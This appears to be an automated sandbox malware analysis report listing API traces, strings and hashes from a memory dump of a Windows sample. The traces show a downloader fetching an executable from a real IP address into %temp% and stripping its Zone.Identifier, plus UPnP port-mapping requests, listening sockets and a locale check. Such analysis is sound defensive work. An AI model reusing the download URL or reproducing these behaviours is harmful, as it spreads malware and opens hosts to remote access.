                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                                                                                                                    • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                    • API String ID: 92872011-445461498
                                                                                                                                    • Opcode ID: e29d1c6c13065a126f61562b4b6d2eaef25e121113ba2b4fb370d418db62171d
                                                                                                                                    • Instruction ID: 96f5080d1998a7d60275ba97af61759e4b4e94f5b4bc08b7936e0b3de653678a
                                                                                                                                    • Opcode Fuzzy Hash: e29d1c6c13065a126f61562b4b6d2eaef25e121113ba2b4fb370d418db62171d
                                                                                                                                    • Instruction Fuzzy Hash: 923145B5900218AFDB10DBA0DC88FDA7778BB48701F40C5E9F609A3195DA75EAD4CF98
                                                                                                                                    APIs
                                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 0040E1AA
                                                                                                                                    • htons.WS2_32(0000076C), ref: 0040E1E0
                                                                                                                                    • inet_addr.WS2_32(239.255.255.250), ref: 0040E1EF
                                                                                                                                    • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040E20D
                                                                                                                                      • Part of subcall function 0040B430: htons.WS2_32(00000050), ref: 0040B45D
                                                                                                                                      • Part of subcall function 0040B430: socket.WS2_32(00000002,00000001,00000000), ref: 0040B47D
                                                                                                                                      • Part of subcall function 0040B430: connect.WS2_32(000000FF,?,00000010), ref: 0040B496
                                                                                                                                      • Part of subcall function 0040B430: getsockname.WS2_32(000000FF,?,00000010), ref: 0040B4C8
                                                                                                                                    • bind.WS2_32(000000FF,?,00000010), ref: 0040E243
                                                                                                                                    • lstrlenA.KERNEL32(X#A,00000000,?,00000010), ref: 0040E25C
                                                                                                                                    • sendto.WS2_32(000000FF,X#A,00000000), ref: 0040E26B
                                                                                                                                    • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040E285
                                                                                                                                      • Part of subcall function 0040E310: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040E35E
                                                                                                                                      • Part of subcall function 0040E310: Sleep.KERNEL32(000003E8), ref: 0040E36E
                                                                                                                                      • Part of subcall function 0040E310: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040E38B
                                                                                                                                      • Part of subcall function 0040E310: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040E3A1
                                                                                                                                      • Part of subcall function 0040E310: StrChrA.SHLWAPI(?,0000000D), ref: 0040E3CE
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                                                                                                                    • String ID: 239.255.255.250$X#A
                                                                                                                                    • API String ID: 726339449-2206458040
                                                                                                                                    • Opcode ID: 6911e90d37da8db62bd51864f6155ca9886bbc89aad1387f27fc75aef26ea545
                                                                                                                                    • Instruction ID: e8e0ae0e245dd7c097b927a75a8676c49a2f7ecfee9f68fb0cb72d84dadb0e27
                                                                                                                                    • Opcode Fuzzy Hash: 6911e90d37da8db62bd51864f6155ca9886bbc89aad1387f27fc75aef26ea545
                                                                                                                                    • Instruction Fuzzy Hash: 7F4119B4E00208ABDB04DFE4D989BEEBBB5EF48304F108569F505B7390E7B55A44CB59
                                                                                                                                    APIs
                                                                                                                                    • GetSystemInfo.KERNEL32(?,?), ref: 00402043
                                                                                                                                    • InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
                                                                                                                                    • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E
                                                                                                                                      • Part of subcall function 0040DBB0: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040DBCE
                                                                                                                                    • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
                                                                                                                                    • setsockopt.WS2_32 ref: 004020D1
                                                                                                                                    • htons.WS2_32(?), ref: 00402101
                                                                                                                                    • bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
                                                                                                                                    • listen.WS2_32(?,7FFFFFFF), ref: 0040212F
                                                                                                                                    • WSACreateEvent.WS2_32 ref: 0040213A
                                                                                                                                    • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E
                                                                                                                                      • Part of subcall function 0040DBE0: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040DC04
                                                                                                                                      • Part of subcall function 0040DBE0: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040DC5F
                                                                                                                                      • Part of subcall function 0040DBE0: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040DC9C
                                                                                                                                      • Part of subcall function 0040DBE0: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040DCA7
                                                                                                                                      • Part of subcall function 0040DBE0: DuplicateHandle.KERNEL32(00000000), ref: 0040DCAE
                                                                                                                                      • Part of subcall function 0040DBE0: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040DCC2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                    • Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                    • Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
• String ID:
• API String ID: 1603358586-0
• Opcode ID: 12e9ac71e1e64606d6e310d867efcd3aad974152cf34b1f89b4218bf20e906ed
• Instruction ID: 7304e093e5df1f4af0f3941d52a0ba2ce6ba101da239ecb0b9d238ba0c2be26e
• Opcode Fuzzy Hash: 12e9ac71e1e64606d6e310d867efcd3aad974152cf34b1f89b4218bf20e906ed
• Instruction Fuzzy Hash: EE41B170640301ABD3209F74CC4AF5B77E4AF44720F108A2DF6A9EA2D4E7F4E545875A
APIs
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
• socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
• htons.WS2_32(?), ref: 00401508
• setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
• bind.WS2_32(?,?,00000010), ref: 0040153B
  • Part of subcall function 00401330: SetEvent.KERNEL32(?,00000000,?,0040154C,00000000), ref: 00401346
  • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401352
  • Part of subcall function 00401330: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040135C
• CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569
Memory Dump Source
• Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
• String ID:
• API String ID: 4174406920-0
• Opcode ID: 93d4027be7e49e3bb9003fc5ae654a5e9afe1d061a8d67f74f828f69ef3a14c4
• Instruction ID: 62ed05d6da85abd953b38b2f92cd08377c0ec6205023cd889ce16e316194a11c
• Opcode Fuzzy Hash: 93d4027be7e49e3bb9003fc5ae654a5e9afe1d061a8d67f74f828f69ef3a14c4
• Instruction Fuzzy Hash: 1731F971A443016BE320DF749C46F9BB6E0AF48B10F40493DF659EB2D0D3B4D544879A
APIs
• GetTickCount.KERNEL32 ref: 0040D782
• ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040D7A8
• recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040D7DF
• GetTickCount.KERNEL32 ref: 0040D7F4
• Sleep.KERNEL32(00000001), ref: 0040D814
• GetTickCount.KERNEL32 ref: 0040D81A
Memory Dump Source
• Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: CountTick$Sleepioctlsocketrecv
• String ID:
• API String ID: 107502007-0
• Opcode ID: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
• Instruction ID: 457d80db37ae817004d1223b894239af033459ee6c7143085fc0b5fbd1cdb933
• Opcode Fuzzy Hash: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
• Instruction Fuzzy Hash: 13310A75D00209EFCB04DFA4D948AEEBBB0FF44315F10866AE821A7280D7749A54CB99
APIs
• htons.WS2_32(00000050), ref: 0040B45D
  • Part of subcall function 0040B3F0: inet_addr.WS2_32(0040B471), ref: 0040B3FA
  • Part of subcall function 0040B3F0: gethostbyname.WS2_32(?), ref: 0040B40D
• socket.WS2_32(00000002,00000001,00000000), ref: 0040B47D
• connect.WS2_32(000000FF,?,00000010), ref: 0040B496
• getsockname.WS2_32(000000FF,?,00000010), ref: 0040B4C8
Strings
• www.update.microsoft.com, xrefs: 0040B467
Memory Dump Source
• Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
• String ID: www.update.microsoft.com
• API String ID: 4063137541-1705189816
• Opcode ID: 6e98f9c7e97e06aef12c993c0efbc8d88427d4f6baa20c341407c54d3fa54141
• Instruction ID: af49af799945b34e8f77a8241ecd355db6f1f506d792f0fdd03f8566860bb8e6
• Opcode Fuzzy Hash: 6e98f9c7e97e06aef12c993c0efbc8d88427d4f6baa20c341407c54d3fa54141
• Instruction Fuzzy Hash: DB212CB4D102099BCB04DFE8D946AEEBBB4EF48300F104169E514F7390E7B45A44DBAA
APIs
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040DFDD,00000000), ref: 004013D5
• socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
• bind.WS2_32(?,?,00000010), ref: 00401429
  • Part of subcall function 00401330: SetEvent.KERNEL32(?,00000000,?,0040154C,00000000), ref: 00401346
  • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00401352
  • Part of subcall function 00401330: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040135C
• CreateThread.KERNEL32(00000000,00000000,Function_00001100,00000000,00000000,00000000), ref: 00401459
Memory Dump Source
• Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
• String ID:
• API String ID: 3943618503-0
• Opcode ID: 553d10466bbec8e054a760f45873b700e7f933e75f0b3e1bb69a1e19c2fd66b5
• Instruction ID: 36f5780ae761d5720ce2b15666c8ad773c7a5b56cb4710f169ddd2cda5c78557
• Opcode Fuzzy Hash: 553d10466bbec8e054a760f45873b700e7f933e75f0b3e1bb69a1e19c2fd66b5
• Instruction Fuzzy Hash: DE116674A417106BE3209F749C0AF877AE0AF04B54F50892DF659E72E1E3B49544879A
APIs
• GetLocaleInfoA.KERNEL32(00000400,00000007,?,0000000A,?,?,00407A28), ref: 0040F1C3
• strcmp.NTDLL ref: 0040F1D2
Strings
Memory Dump Source
• Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: InfoLocalestrcmp
• String ID: UKR
• API String ID: 3191669094-64918367
• Opcode ID: 8e44c828f7342be6b1b961f5fa6f40dd4523076a999cbca5f949ecc83b5425ee
• Instruction ID: 1be06a77ef1098bc08a48f46d8927727b75ba0885e831d13d66ebc3380d14d50
• Opcode Fuzzy Hash: 8e44c828f7342be6b1b961f5fa6f40dd4523076a999cbca5f949ecc83b5425ee
• Instruction Fuzzy Hash: FDE01276E44308B6DA20A6A0AD02BE6776C6715705F0001B6BE08AA5C1E9B9961DC7EA
Control-flow Graph
APIs
• GetTickCount.KERNEL32 ref: 0040F569
• srand.MSVCRT ref: 0040F570
• ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040F590
• strlen.NTDLL ref: 0040F59A
• mbstowcs.NTDLL ref: 0040F5B1
• rand.MSVCRT ref: 0040F5B9
• rand.MSVCRT ref: 0040F5CD
• wsprintfW.USER32 ref: 0040F5F4
• InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040F60A
• InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F639
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F668
• InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040F69B
• WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040F6CC
• CloseHandle.KERNEL32(000000FF), ref: 0040F6DB
• wsprintfW.USER32 ref: 0040F6F4
• DeleteFileW.KERNEL32(?), ref: 0040F704
• Sleep.KERNEL32(000003E8), ref: 0040F70F
• Sleep.KERNEL32(000007D0), ref: 0040F730
• ExitProcess.KERNEL32 ref: 0040F758
• DeleteFileW.KERNEL32(?), ref: 0040F76E
• CloseHandle.KERNEL32(000000FF), ref: 0040F77B
• InternetCloseHandle.WININET(00000000), ref: 0040F788
• InternetCloseHandle.WININET(00000000), ref: 0040F795
• Sleep.KERNEL32(000003E8), ref: 0040F7A0
• rand.MSVCRT ref: 0040F7B5
• Sleep.KERNEL32 ref: 0040F7C6
• rand.MSVCRT ref: 0040F7CC
• rand.MSVCRT ref: 0040F7E0
• wsprintfW.USER32 ref: 0040F807
• URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040F824
• wsprintfW.USER32 ref: 0040F844
• DeleteFileW.KERNEL32(?), ref: 0040F854
• Sleep.KERNEL32(000003E8), ref: 0040F85F
• Sleep.KERNEL32(000007D0), ref: 0040F880
• ExitProcess.KERNEL32 ref: 0040F8A7
• DeleteFileW.KERNEL32(?), ref: 0040F8B6
Strings
• %s:Zone.Identifier, xrefs: 0040F838
• %s:Zone.Identifier, xrefs: 0040F6E8
• %s\%d%d.exe, xrefs: 0040F7FB
• %temp%, xrefs: 0040F58B
• %s\%d%d.exe, xrefs: 0040F5E8
• Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 0040F605
Memory Dump Source
• Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: File$Sleep$Internetrand$CloseDeleteHandlewsprintf$ExitOpenProcess$CountCreateDownloadEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
• String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
• API String ID: 1632876846-2803014298
• Opcode ID: 96f0a69f3da845a58fc131bbffdea3f28c32c868df6781a1e5befd7d1371e6b2
• Instruction ID: 1975aeac9676e101a2f9df26b0893873e865047fe5e1fa68f0a59d9663d47833
• Opcode Fuzzy Hash: 96f0a69f3da845a58fc131bbffdea3f28c32c868df6781a1e5befd7d1371e6b2
                                                                                                                                    • Instruction Fuzzy Hash: EB81DBB1900314ABE720DB50DC45FE93379AF88701F0485B9F609A51D1DBBD9AC8CF69

Control-flow Graph

APIs
• GetTickCount.KERNEL32 ref: 004064A9
• srand.MSVCRT ref: 004064B0
• ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 004064D0
• rand.MSVCRT ref: 004064D6
• rand.MSVCRT ref: 004064EA
• wsprintfW.USER32 ref: 0040650F
• InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00406525
• InternetOpenUrlW.WININET(00000000,http://185.215.113.66/tdrp.exe,00000000,00000000,00000000,00000000), ref: 00406552
• CreateFileW.KERNEL32(00415BA8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040657F
• InternetReadFile.WININET(00000000,?,00000103,?), ref: 004065B2
• WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 004065E3
• CloseHandle.KERNEL32(000000FF), ref: 004065F2
• wsprintfW.USER32 ref: 00406609
• DeleteFileW.KERNEL32(?), ref: 00406619
• CloseHandle.KERNEL32(000000FF), ref: 0040662D
• InternetCloseHandle.WININET(00000000), ref: 0040663A
• InternetCloseHandle.WININET(00000000), ref: 00406647
Strings
• Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 00406520
• %s\%d%d.exe, xrefs: 00406505
• %s:Zone.Identifier, xrefs: 004065FD
• %temp%, xrefs: 004064CB
• http://185.215.113.66/tdrp.exe, xrefs: 00406546
Memory Dump Source
• Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: Internet$CloseFileHandle$Openrandwsprintf$CountCreateDeleteEnvironmentExpandReadStringsTickWritesrand
• String ID: %s:Zone.Identifier$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36$http://185.215.113.66/tdrp.exe
• API String ID: 2816847299-853099633
• Opcode ID: b747dd0fc59dfde576c8c27ad5e268025f255cbc5a09298799a3dfcc346330de
• Instruction ID: 1fb007f132407df9fd1c0735e7405706d6c761cf3eec079010f6fac199ffc060
• Opcode Fuzzy Hash: b747dd0fc59dfde576c8c27ad5e268025f255cbc5a09298799a3dfcc346330de
• Instruction Fuzzy Hash: 524194B4A41318BBD7209B60DC4DFDA7774AB48701F1085E5F60AB61D1DABD6AC0CF28

Control-flow Graph

control_flow_graph 546 40b850-40b867 call 40b780 549 40b869 546->549 550 40b86e-40b88a call 40b3d0 strcmp 546->550 551 40baf5-40baf8 549->551 554 40b891-40b8ad call 40b3d0 strstr 550->554 555 40b88c 550->555 558 40b8f0-40b90c call 40b3d0 strstr 554->558 559 40b8af-40b8cb call 40b3d0 strstr 554->559 555->551 566 40b90e-40b92a call 40b3d0 strstr 558->566 567 40b94f-40b96b call 40b3d0 strstr 558->567 564 40b8eb 559->564 565 40b8cd-40b8e9 call 40b3d0 strstr 559->565 564->551 565->558 565->564 576 40b94a 566->576 577 40b92c-40b948 call 40b3d0 strstr 566->577 574 40b96d-40b989 call 40b3d0 strstr 567->574 575 40b9ae-40b9c4 EnterCriticalSection 567->575 586 40b9a9 574->586 587 40b98b-40b9a7 call 40b3d0 strstr 574->587 579 40b9cf-40b9d8 575->579 576->551 577->567 577->576 582 40ba09-40ba14 call 40bb00 579->582 583 40b9da-40b9ea 579->583 595 40baea-40baef LeaveCriticalSection 582->595 596 40ba1a-40ba28 582->596 588 40ba07 583->588 589 40b9ec-40ba05 call 40df20 583->589 586->551 587->575 587->586 588->579 589->582 595->551 598 40ba2a 596->598 599 40ba2e-40ba3f call 40a740 596->599 598->599 599->595 602 40ba45-40ba62 call 40df20 599->602 605 40ba64-40ba74 602->605 606 40baba-40bad2 602->606 608 40ba80-40bab8 call 40ab60 605->608 609 40ba76-40ba7e Sleep 605->609 607 40bad8-40bae3 call 40bb00 606->607 607->595 614 40bae5 call 40b530 607->614 608->607 609->605 614->595
APIs
  • Part of subcall function 0040B780: gethostname.WS2_32(?,00000100), ref: 0040B79C
  • Part of subcall function 0040B780: gethostbyname.WS2_32(?), ref: 0040B7AE
• strcmp.NTDLL ref: 0040B880
Strings
Memory Dump Source
• Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: gethostbynamegethostnamestrcmp
• String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
• API String ID: 2906596889-2213908610
• Opcode ID: d6ab6244daa99f352ff27f4ac61a156b87516d70ae34b11a0156eb07d3042b9e
• Instruction ID: 8d4abfb17ef92fbeb3a58b36540fc168dced5822f8e8c36773a64fbd4adfcb3b
• Opcode Fuzzy Hash: d6ab6244daa99f352ff27f4ac61a156b87516d70ae34b11a0156eb07d3042b9e
• Instruction Fuzzy Hash: 826181B5A00205ABDB00AFA1FC46B9A3665EB50318F14847AE805B73C1EB7DE554CBDE

Control-flow Graph

control_flow_graph 616 401920-401947 GetTickCount WaitForSingleObject 617 401ac9-401acf 616->617 618 40194d-401964 WSAWaitForMultipleEvents 616->618 619 4019f0-401a03 GetTickCount 618->619 620 40196a-401981 WSAEnumNetworkEvents 618->620 622 401a43-401a4c GetTickCount 619->622 623 401a05-401a14 EnterCriticalSection 619->623 620->619 621 401983-401988 620->621 621->619 626 40198a-401990 621->626 627 401ab5-401ac3 WaitForSingleObject 622->627 628 401a4e-401a5d EnterCriticalSection 622->628 624 401a16-401a1d 623->624 625 401a3a-401a41 LeaveCriticalSection 623->625 629 401a35 call 401820 624->629 630 401a1f-401a27 624->630 625->627 626->619 631 401992-4019b1 accept 626->631 627->617 627->618 632 401aa1-401ab1 LeaveCriticalSection GetTickCount 628->632 633 401a5f-401a77 InterlockedExchangeAdd call 40df20 628->633 629->625 630->624 634 401a29-401a30 LeaveCriticalSection 630->634 631->619 636 4019b3-4019c2 call 4022c0 631->636 632->627 641 401a97-401a9f 633->641 642 401a79-401a82 633->642 634->627 636->619 643 4019c4-4019df call 401740 636->643 641->632 641->633 642->641 644 401a84-401a8d call 40b4f0 642->644 643->619 649 4019e1-4019e7 643->649 644->641 649->619 650 4019e9-4019eb call 401cf0 649->650 650->619
APIs
• GetTickCount.KERNEL32 ref: 0040192C
• WaitForSingleObject.KERNEL32(?,00000001), ref: 0040193F
• WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 00401959
• WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 00401976
• accept.WS2_32(?,?,?), ref: 004019A8
• GetTickCount.KERNEL32 ref: 004019F6
• EnterCriticalSection.KERNEL32(?), ref: 00401A09
• LeaveCriticalSection.KERNEL32(?), ref: 00401A2A
• LeaveCriticalSection.KERNEL32(?), ref: 00401A3B
• GetTickCount.KERNEL32 ref: 00401A43
• EnterCriticalSection.KERNEL32(?), ref: 00401A52
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 00401A65
• LeaveCriticalSection.KERNEL32(?), ref: 00401AA5
• GetTickCount.KERNEL32 ref: 00401AAB
• WaitForSingleObject.KERNEL32(?,00000001), ref: 00401ABB
Strings
Memory Dump Source
• Source File: 00000011.00000002.1975984094.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.1975956652.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000011.00000002.1976047598.0000000000414000.00000008.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_sysppvrdnvs.jbxd
Yara matches
Similarity
• API ID: CriticalSection$CountTick$LeaveWait$EnterEventsObjectSingle$EnumExchangeInterlockedMultipleNetworkaccept
• String ID: PCOI$ilci
• API String ID: 3345448188-3762367603
• Opcode ID: d8b23688097d5b99dadb860a55cedc453d5f8d353fdf8d3fa83597af6fbeb7f2
• Instruction ID: 80b39a6ab1993389b90647d5cb6895440bceaa9a0d1ea8ab9cba8154187b69d5
• Opcode Fuzzy Hash: d8b23688097d5b99dadb860a55cedc453d5f8d353fdf8d3fa83597af6fbeb7f2
• Instruction Fuzzy Hash: A7411771601201ABCB20DF74DC8CB9B77A9AF44720F04863DF855A72E1DB78E985CB99

Control-flow Graph

APIs
• memset.NTDLL ref: 0040EF98
• InternetCrackUrlA.WININET(00009E34,00000000,10000000,0000003C), ref: 0040EFE8
• InternetOpenA.WININET(Mozilla/4.0 (compatible; UPnP/1.0; Windows 9x),00000001,00000000,00000000,00000000), ref: 0040EFFB
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040F034
• HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00000000,00000000), ref: 0040F06A
• HttpAddRequestHeadersA.WININET(00000000,?,000000FF,A0000000), ref: 0040F095
• HttpSendRequestA.WININET(00000000,004126B0,000000FF,00009E34), ref: 0040F0BF
